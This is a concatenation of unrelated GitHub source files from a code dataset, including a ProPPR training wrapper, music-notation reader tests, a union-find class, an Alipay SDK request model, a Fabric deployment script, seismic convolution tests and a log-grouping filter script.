max_stars_repo_path (stringlengths 4 to 245) | max_stars_repo_name (stringlengths 7 to 115) | max_stars_count (int64 101 to 368k) | id (stringlengths 2 to 8) | content (stringlengths 6 to 1.03M) |
---|---|---|---|---|
scripts/proppr-helpers/pronghorn-wrapper.py | TeamCohen/ProPPR | 138 | 12774845 | <reponame>TeamCohen/ProPPR<gh_stars>100-1000
import sys
import os
import shutil
import getopt
import logging
import subprocess
import util as u
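# makebackup returns the first unused backup filename of the form f.1, f.2, ...
# for the given file f; it only picks the name and does not copy anything itself.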
def makebackup(f):
bi=1
backup = "%s.%d" % (f,bi)
#backup_parent = "./"
#if f[0] == "/": backup_parent=""
#if f.rfind("/") > 0: backup_parent += f[:f.rfind("/")]
while os.path.isfile(backup):#backup in os.listdir(backup_parent):
bi+=1
backup = "%s.%d" % (f,bi)
return backup
if __name__=="__main__":
logging.basicConfig(level=logging.INFO)
#usage: the following arguments, followed by a "+" and a list
#of any remaining arguments to pass back to calls of the 'proppr'
#script in invokeProppr
argspec = ["src=", "src2=", "dst=", "dst2=", "stem=",
"C=", "n", #global proppr opts
"model=", "numIters=",
]
try:
optlist,args = getopt.getopt(sys.argv[1:], 'x', argspec)
except getopt.GetoptError as err:
print 'option error: ',str(err)
sys.exit(-1)
optdict = dict(optlist)
optdict['PROPPR_ARGS'] = args[1:]
queries = optdict['--src']
dbFile = optdict['--src2']
modelFile = optdict['--dst']
paramsFile = optdict['--dst2']
stem = optdict['--stem']
modelType = optdict['--model']
numIters = int(optdict['--numIters'])
eta = 1.0
if "--eta" in args:
i=args.index("--eta")
eta = float(args[i+1])
optdict['PROPPR_ARGS'] = args[1:i]+args[i+2:]
# make ground file
groundFile = stem+".grounded"
u.invokeProppr(optdict,'ground',queries,groundFile)
# make gradient file
gradFile = stem+".gradient"
u.invokeProppr(optdict,'gradient',groundFile,gradFile,"--epochs","0")
for i in range(numIters):
logging.info('training pass %i' % i)
# update pronghorn model
u.invokeHelper(optdict,'pronghorn.py',"update",gradFile,paramsFile,dbFile,modelFile,modelType,"--eta","%g"%eta)
# backup paramsFile
backup = makebackup(paramsFile)
if "--n" not in optdict:
shutil.copyfile(paramsFile,backup)
# proppr update
u.invokeProppr(optdict,'gradient',groundFile,gradFile,"--epochs","1","--initParams",backup,"--params",paramsFile,"--srw","ppr:eta=%g" % eta)
eta = eta * 0.8
# update pronghorn model
u.invokeHelper(optdict,'pronghorn.py',"update",gradFile,paramsFile,dbFile,modelFile,modelType)
|
moonlight/score/reader_test.py | lithomas1/moonlight | 288 | 12774855 | <reponame>lithomas1/moonlight
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the OMR score reader."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import librosa
from protobuf import music_pb2
from moonlight import conversions
from moonlight.protobuf import musicscore_pb2
from moonlight.score import reader
# pylint: disable=invalid-name
Glyph = musicscore_pb2.Glyph
Note = music_pb2.NoteSequence.Note
Point = musicscore_pb2.Point
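# In these tests, y_position counts staff steps from the center line (positive is
# up, one step per note letter), so y_position 0 on a treble staff reads as B4 and
# -6 reads as C4.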
class ReaderTest(absltest.TestCase):
def testTreble_simple(self):
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('B4'), start_time=0, end_time=1)
]))
def testBass_simple(self):
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=1,
y_position=reader.BASS_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('D3'), start_time=0, end_time=1)
]))
def testTreble_accidentals(self):
staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.FLAT, x=16, y_position=-4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=30, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=-4),
])
staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=150), Point(x=100, y=150)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=30, y_position=-2),
Glyph(type=Glyph.SHARP, x=35, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=-2),
Glyph(type=Glyph.NATURAL, x=45, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-2),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(staff=[staff_1]),
musicscore_pb2.StaffSystem(staff=[staff_2])
])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# First staff.
Note(pitch=librosa.note_to_midi('C4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('Eb4'), start_time=1, end_time=2),
Note(pitch=librosa.note_to_midi('G4'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('Eb4'), start_time=3, end_time=4),
# Second staff.
Note(pitch=librosa.note_to_midi('C4'), start_time=4, end_time=5),
Note(pitch=librosa.note_to_midi('E4'), start_time=5, end_time=6),
Note(pitch=librosa.note_to_midi('G4'), start_time=6, end_time=7),
Note(pitch=librosa.note_to_midi('G#4'), start_time=7, end_time=8),
Note(pitch=librosa.note_to_midi('G4'), start_time=8, end_time=9),
]))
def testChords(self):
stem_1 = musicscore_pb2.LineSegment(
start=Point(x=20, y=10), end=Point(x=20, y=70))
stem_2 = musicscore_pb2.LineSegment(
start=Point(x=50, y=10), end=Point(x=50, y=70))
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# Chord of 2 notes.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-4, stem=stem_1),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-1, stem=stem_1),
# Note not attached to a stem.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=30, y_position=3),
# Chord of 3 notes.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=0, stem=stem_2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=60, y_position=2, stem=stem_2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=60, y_position=4, stem=stem_2),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# First chord.
Note(pitch=librosa.note_to_midi('E4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('A4'), start_time=0, end_time=1),
# Note without a stem.
Note(pitch=librosa.note_to_midi('E5'), start_time=1, end_time=2),
# Second chord.
Note(pitch=librosa.note_to_midi('B4'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('D5'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('F5'), start_time=2, end_time=3),
]))
def testBeams(self):
beam_1 = musicscore_pb2.LineSegment(
start=Point(x=10, y=20), end=Point(x=40, y=20))
beam_2 = musicscore_pb2.LineSegment(
start=Point(x=70, y=40), end=Point(x=90, y=40))
beam_3 = musicscore_pb2.LineSegment(
start=Point(x=70, y=60), end=Point(x=90, y=60))
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# 2 eighth notes.
Glyph(
type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-4, beam=[beam_1]),
Glyph(
type=Glyph.NOTEHEAD_FILLED, x=40, y_position=-1, beam=[beam_1]),
# 1 quarter note.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=0),
# 2 sixteenth notes.
Glyph(
type=Glyph.NOTEHEAD_FILLED,
x=60,
y_position=-2,
beam=[beam_2, beam_3]),
Glyph(
type=Glyph.NOTEHEAD_FILLED,
x=90,
y_position=2,
beam=[beam_2, beam_3]),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('E4'), start_time=0, end_time=0.5),
Note(pitch=librosa.note_to_midi('A4'), start_time=0.5, end_time=1),
Note(pitch=librosa.note_to_midi('B4'), start_time=1, end_time=2),
Note(pitch=librosa.note_to_midi('G4'), start_time=2, end_time=2.25),
Note(
pitch=librosa.note_to_midi('D5'), start_time=2.25,
end_time=2.5),
]))
def testAllNoteheadTypes(self):
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_WHOLE, x=10, y_position=-6),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('C4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('C4'), start_time=1, end_time=3),
Note(pitch=librosa.note_to_midi('C4'), start_time=3, end_time=7),
]))
def testStaffSystems(self):
# 2 staff systems on separate pages, each with 2 staves, and no bars.
system_1_staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-2),
])
system_1_staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=150), Point(x=100, y=150)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=2,
y_position=reader.BASS_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=2),
# Played after the second note in the first staff, although it is to
# the left of it.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=45, y_position=4),
])
system_2_staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=250), Point(x=100, y=250)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.REST_QUARTER, x=20, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-2),
])
system_2_staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=250), Point(x=100, y=250)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=2,
y_position=reader.BASS_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=2),
])
notes = conversions.score_to_notesequence(reader.ScoreReader()(
musicscore_pb2.Score(page=[
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(
staff=[system_1_staff_1, system_1_staff_2]),
]),
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(
staff=[system_2_staff_1, system_2_staff_2]),
]),
]),))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# System 1, staff 1.
Note(pitch=librosa.note_to_midi('C4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('G4'), start_time=1, end_time=2),
# System 1, staff 2.
Note(pitch=librosa.note_to_midi('D3'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('F3'), start_time=1, end_time=2),
Note(pitch=librosa.note_to_midi('A3'), start_time=2, end_time=3),
# System 2, staff 1.
# Quarter rest.
Note(pitch=librosa.note_to_midi('G4'), start_time=4, end_time=5),
# System 2, staff 2.
Note(pitch=librosa.note_to_midi('D3'), start_time=3, end_time=4),
Note(pitch=librosa.note_to_midi('F3'), start_time=4, end_time=5),
]))
def testMeasures(self):
# 2 staves in the same staff system with multiple bars.
staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=300, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# Key signature.
Glyph(type=Glyph.SHARP, x=10, y_position=+4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-2),
# Accidental.
Glyph(type=Glyph.FLAT, x=40, y_position=-1),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-1),
# Second bar.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=120, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=180, y_position=+4),
# Third bar.
# Accidental not propagated to this note.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=220, y_position=-1),
])
staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=150), Point(x=300, y=150)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=1,
y_position=reader.BASS_CLEF_EXPECTED_Y),
# Key signature.
Glyph(type=Glyph.FLAT, x=15, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=+2),
# Second bar.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=150, y_position=-2),
# Third bar.
Glyph(type=Glyph.REST_QUARTER, x=220, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=280, y_position=-2),
])
staff_system = musicscore_pb2.StaffSystem(
staff=[staff_1, staff_2],
bar=[_bar(0), _bar(100), _bar(200),
_bar(300)])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[staff_system])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# Staff 1, bar 1.
Note(pitch=librosa.note_to_midi('G4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('Ab4'), start_time=1, end_time=2),
# Staff 1, bar 2.
Note(pitch=librosa.note_to_midi('B4'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('F#5'), start_time=3, end_time=4),
# Staff 1, bar 3.
Note(pitch=librosa.note_to_midi('A4'), start_time=4, end_time=5),
# Staff 2, bar 1.
Note(pitch=librosa.note_to_midi('Bb2'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('F3'), start_time=1, end_time=2),
# Staff 2, bar 2.
Note(pitch=librosa.note_to_midi('Bb2'), start_time=2, end_time=3),
# Staff 2, bar 3.
Note(pitch=librosa.note_to_midi('Bb2'), start_time=5, end_time=6),
]))
def testKeySignatures(self):
# One staff per system, two systems.
staff_1 = musicscore_pb2.Staff(glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=5,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# D major key signature.
Glyph(type=Glyph.SHARP, x=15, y_position=+4),
Glyph(type=Glyph.SHARP, x=25, y_position=+1),
# Accidental which cannot be interpreted as part of the key
# signature.
Glyph(type=Glyph.SHARP, x=35, y_position=+2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=45, y_position=+2), # D#5
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=55, y_position=+1), # C#5
Glyph(type=Glyph.NOTEHEAD_FILLED, x=65, y_position=-3), # F#4
# New measure. The key signature should be retained.
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=105, y_position=-3), # F#4
Glyph(type=Glyph.NOTEHEAD_FILLED, x=125, y_position=+1), # C#5
# Accidental is not retained.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=145, y_position=+2), # D5
])
staff_2 = musicscore_pb2.Staff(glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=5,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# No key signature on this line. No accidentals.
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=25, y_position=-3), # F4
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=45, y_position=+1), # C5
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(
staff=[staff_1], bar=[_bar(0), _bar(100),
_bar(200)]),
musicscore_pb2.StaffSystem(staff=[staff_2]),
])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# First measure.
Note(pitch=librosa.note_to_midi('D#5'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('C#5'), start_time=1, end_time=3),
Note(pitch=librosa.note_to_midi('F#4'), start_time=3, end_time=4),
# Second measure.
Note(pitch=librosa.note_to_midi('F#4'), start_time=4, end_time=6),
Note(pitch=librosa.note_to_midi('C#5'), start_time=6, end_time=7),
Note(pitch=librosa.note_to_midi('D5'), start_time=7, end_time=8),
# Third measure on a new line, with no key signature.
Note(pitch=librosa.note_to_midi('F4'), start_time=8, end_time=10),
Note(pitch=librosa.note_to_midi('C5'), start_time=10, end_time=12),
]))
def _bar(x):
return musicscore_pb2.StaffSystem.Bar(
x=x, type=musicscore_pb2.StaffSystem.Bar.STANDARD_BAR)
if __name__ == '__main__':
absltest.main()
|
python/py-set-add.py | gajubadge11/HackerRank-1 | 340 | 12774878 | #!/usr/bin/env python3
if __name__ == "__main__":
N = int(input().strip())
stamps = set()
for _ in range(N):
stamp = input().strip()
stamps.add(stamp)
print(len(stamps)) |
inselect/lib/templates/__init__.py | NaturalHistoryMuseum/inselect | 128 | 12774895 | """Metadata templates
"""
|
data_structures/sets/quick_find_union_find.py | vinta/fuck-coding-interviews | 590 | 12774896 | # coding: utf-8
"""
Union-Find (Disjoint Set)
https://en.wikipedia.org/wiki/Disjoint-set_data_structure
"""
class QuickFindUnionFind:
def __init__(self, union_pairs=()):
self.num_groups = 0
self.auto_increment_id = 1
self.element_groups = {
# element: group_id,
}
for p, q in union_pairs:
self.union(p, q)
def __len__(self):
return self.num_groups
# O(1)
def make_group(self, element):
# Initially, every element is in its own group which contains only itself.
group_id = self.element_groups.get(element)
if group_id is None:
# Group id could be arbitrary as long as each group has an unique one.
group_id = self.auto_increment_id
self.element_groups[element] = group_id
self.num_groups += 1
self.auto_increment_id += 1
return group_id
# O(1)
def find(self, p):
try:
return self.element_groups[p]
except KeyError:
# We implicitly create a new group for the new element `p`.
return self.make_group(p)
# O(n)
def union(self, p, q):
p_group_id = self.find(p)
q_group_id = self.find(q)
if p_group_id != q_group_id:
for element, group_id in self.element_groups.items():
# Merge p into q.
if group_id == p_group_id:
self.element_groups[element] = q_group_id
self.num_groups -= 1
# O(1)
def is_connected(self, p, q):
return self.find(p) == self.find(q)
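# Minimal usage sketch (the integer labels below are arbitrary example elements):
if __name__ == '__main__':
    uf = QuickFindUnionFind(union_pairs=[(1, 2), (2, 3)])
    print(uf.is_connected(1, 3))  # True: 1-2 and 2-3 were merged into one group
    uf.union(4, 5)
    print(len(uf))  # 2 groups remain: {1, 2, 3} and {4, 5}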
|
fabfile.py | khamidou/kite | 136 | 12774900 | <filename>fabfile.py
# fabfile for update and deploy
# it's necessary to specify an host
from fabric.api import *
from fabric.contrib.project import rsync_project
from fabric.contrib.files import upload_template
from setup_config import *
PACKAGES = ('rsync', 'puppet')
def update_sources():
rsync_project("~", "../kite", exclude=[".git/", "*.swp", "*.pyc"])
def provision():
cmd = """FACTER_server_name="%s" && export FACTER_server_name && FACTER_user_home_dir=$HOME && export FACTER_user_home_dir && puppet apply $HOME/kite/manifests/server.pp --modulepath=$HOME/kite/puppet_modules""" % env.hosts[0]
sudo(cmd)
def update():
update_sources()
provision()
def setup():
sudo("apt-get update")
for package in PACKAGES:
sudo('apt-get -y install %s' % package)
update()
def tighten():
local("ssh-copy-id %s@%s" % (env.user, env.hosts[0]))
sudo("puppet apply $HOME/kite/manifests/sshd.pp --modulepath=$HOME/kite/puppet_modules")
|
alipay/aop/api/domain/AlipayBossOrderDiagnosisGetModel.py | snowxmas/alipay-sdk-python-all | 213 | 12774917 | <reponame>snowxmas/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
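# Request model for the AlipayBossOrderDiagnosisGet query: a set of plain
# properties plus to_alipay_dict/from_alipay_dict helpers used by the SDK
# for (de)serialization.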
class AlipayBossOrderDiagnosisGetModel(object):
def __init__(self):
self._code = None
self._end_time = None
self._find_operator = None
self._order_no = None
self._out_order_no = None
self._source = None
self._start_time = None
@property
def code(self):
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def find_operator(self):
return self._find_operator
@find_operator.setter
def find_operator(self, value):
self._find_operator = value
@property
def order_no(self):
return self._order_no
@order_no.setter
def order_no(self, value):
self._order_no = value
@property
def out_order_no(self):
return self._out_order_no
@out_order_no.setter
def out_order_no(self, value):
self._out_order_no = value
@property
def source(self):
return self._source
@source.setter
def source(self, value):
self._source = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
def to_alipay_dict(self):
params = dict()
if self.code:
if hasattr(self.code, 'to_alipay_dict'):
params['code'] = self.code.to_alipay_dict()
else:
params['code'] = self.code
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.find_operator:
if hasattr(self.find_operator, 'to_alipay_dict'):
params['find_operator'] = self.find_operator.to_alipay_dict()
else:
params['find_operator'] = self.find_operator
if self.order_no:
if hasattr(self.order_no, 'to_alipay_dict'):
params['order_no'] = self.order_no.to_alipay_dict()
else:
params['order_no'] = self.order_no
if self.out_order_no:
if hasattr(self.out_order_no, 'to_alipay_dict'):
params['out_order_no'] = self.out_order_no.to_alipay_dict()
else:
params['out_order_no'] = self.out_order_no
if self.source:
if hasattr(self.source, 'to_alipay_dict'):
params['source'] = self.source.to_alipay_dict()
else:
params['source'] = self.source
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayBossOrderDiagnosisGetModel()
if 'code' in d:
o.code = d['code']
if 'end_time' in d:
o.end_time = d['end_time']
if 'find_operator' in d:
o.find_operator = d['find_operator']
if 'order_no' in d:
o.order_no = d['order_no']
if 'out_order_no' in d:
o.out_order_no = d['out_order_no']
if 'source' in d:
o.source = d['source']
if 'start_time' in d:
o.start_time = d['start_time']
return o
|
fatiando/seismic/tests/test_seismic_conv.py | XuesongDing/fatiando | 179 | 12774951 | from __future__ import absolute_import, division
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_allclose
from pytest import raises
from fatiando.seismic import conv
def test_impulse_response():
"""
    conv.convolutional_model returns the source wavelet when the reflectivity
    model is a centred spike and the model has the same length as the source
    wavelet.
"""
w = conv.rickerwave(30., 2.e-3)
rc_test = np.zeros((w.shape[0], 20))
rc_test[w.shape[0]//2, :] = 1.
spike = conv.convolutional_model(rc_test, 30., conv.rickerwave, dt=2.e-3)
for j in range(0, rc_test.shape[1]):
assert_array_almost_equal(spike[:, j], w, 9)
def test_rc_shorter_than_wavelet():
"""
    When the reflectivity series is shorter than the wavelet, the spike
    response is observed as in the opposite case; the difference is that the
    Ricker wavelet (or other symmetric wavelet) is truncated in the result.
"""
w = conv.rickerwave(30., 2.e-3)
rc_test = np.zeros((21, 20))
rc_test[rc_test.shape[0]//2, :] = 1
spike = conv.convolutional_model(rc_test, 30., conv.rickerwave, dt=2.e-3)
for j in range(0, rc_test.shape[1]):
wmin = (w.shape[0] - rc_test.shape[0])//2
wmax = -(w.shape[0] - rc_test.shape[0])//2
assert_array_almost_equal(spike[:, j], w[wmin:wmax], 9)
def test_reflectivity_wrong_dimensions():
"""
    Velocity and density are provided as matrices or vectors to the
    reflectivity calculation, so they must have the same shape.
"""
vel = np.ones((10, 10))
dens = np.ones((11, 11))
raises(AssertionError, conv.reflectivity, vel, dens)
vel = np.ones((10))
dens = np.ones((11))
raises(AssertionError, conv.reflectivity, vel, dens)
def test_depth_2_time_wrong_dimensions():
"""
    Velocity and the property to convert are provided as matrices to the
    depth-to-time conversion, so they must have the same shape.
"""
vel = np.ones((10, 10))
dens = np.ones((11, 11))
dt = 2.e-3
dz = 1.
raises(AssertionError, conv.depth_2_time, vel, dens, dt, dz)
def test_ricker():
"""
    conv.rickerwave inputs must satisfy the condition for sampling and
    stability, otherwise an error is raised.
"""
f = 50.
dt = 2.e-3
raises(AssertionError, conv.rickerwave, f, dt)
|
odin/metrics/performance_summary.py | gsamarakoon/Odin | 103 | 12774964 | <reponame>gsamarakoon/Odin<filename>odin/metrics/performance_summary.py
import pandas as pd
from .compute_drawdowns import compute_drawdowns
from .compute_sharpe_ratio import compute_sharpe_ratio
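# Note: the annualized-returns calculation below assumes one equity row per
# trading day (252 trading days per year).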
def performance_summary(history, portfolio_id):
"""This function computes common performance metrics for a time-series of
portfolio equity states. For instance, the function will compute the Sharpe
ratio, the maximum drawdown, the drawdown duration, the annualized returns
and the average number of positions held at each moment in the time-series.
Parameters
----------
history: A portfolio history object.
The portfolio history object containing the equity and positional
information for a time-series corresponding to the period of performance
of a trading algorithm.
portfolio_id: String.
A unique identifier assigned to the portfolio.
"""
equity = history.equity
n = len(equity)
m = pd.DataFrame(index=[portfolio_id])
m.ix[portfolio_id, "total equity"] = equity.ix[-1]
m.ix[portfolio_id, "max equity"] = equity.max()
m.ix[portfolio_id, "max drawdown"], m.ix[portfolio_id, "max duration"] = (
compute_drawdowns(equity)
)
m.ix[portfolio_id, "sharpe ratio"] = (
compute_sharpe_ratio(history.returns)
)
m.ix[portfolio_id, "avg positions"] = history.n_positions.mean()
m.ix[portfolio_id, "annualized returns"] = (
(1. + history.returns).prod() ** (252. / n)
)
return m
|
src/filter.py | Boyploy/IMF | 108 | 12775005 | <filename>src/filter.py
# Copyright (c) 2017 <NAME> and <NAME> at SoftSec, KAIST
#
# See the file LICENCE for copying permission.
import os
import utils
import sys
def parse_name(data):
return data.split('\'')[1]
def parse_selector(data):
if 'selector' in data:
ret = data.split('selector')[1].split('\'value\':')[1].split(',')[0]
ret = int(ret.strip()[2:], 16)
return ret
return None
def merge(name, selector):
ret = name
if selector != None:
ret = '%s, %d'%(name, selector)
return ret.__hash__()
def loader(path):
ret = []
with open(path, 'rb') as f:
data = f.read().split('\n')[:-1]
idx = 0
while idx < len(data):
name = parse_name(data[idx])
selector = parse_selector(data[idx])
hval = merge(name, selector)
ret.append(hval)
idx += 2
return path, ret
def list_dir(path):
files = []
for fn in os.listdir(path):
files.append(os.path.join(path, fn))
return files
def get(l, idx):
if len(l) >idx:
return l[idx]
return None
def categorize(groups, idx):
ret = []
for group in groups:
tmp = {}
for fn, hvals in group:
hval = get(hvals, idx)
if hval not in tmp:
tmp[hval] = []
tmp[hval].append((fn, hvals))
for hval in tmp:
if hval != None :
ret.append(tmp[hval])
return ret
def pick_best(groups, n):
for group in groups:
if len(group) >= n:
return group[:n]
return None
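# find_best repeatedly regroups logs by their idx-th hashed call; when no group of
# at least n logs survives another step, it returns the last group that did (logs
# sharing an identical call prefix) together with the prefix length idx.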
def find_best(groups, n):
before = None
idx = 0
while len(groups) != 0:
before = groups
groups = categorize(groups, idx)
if pick_best(groups, n) == None:
return pick_best(before, n), idx
idx += 1
utils.error('find_best error')
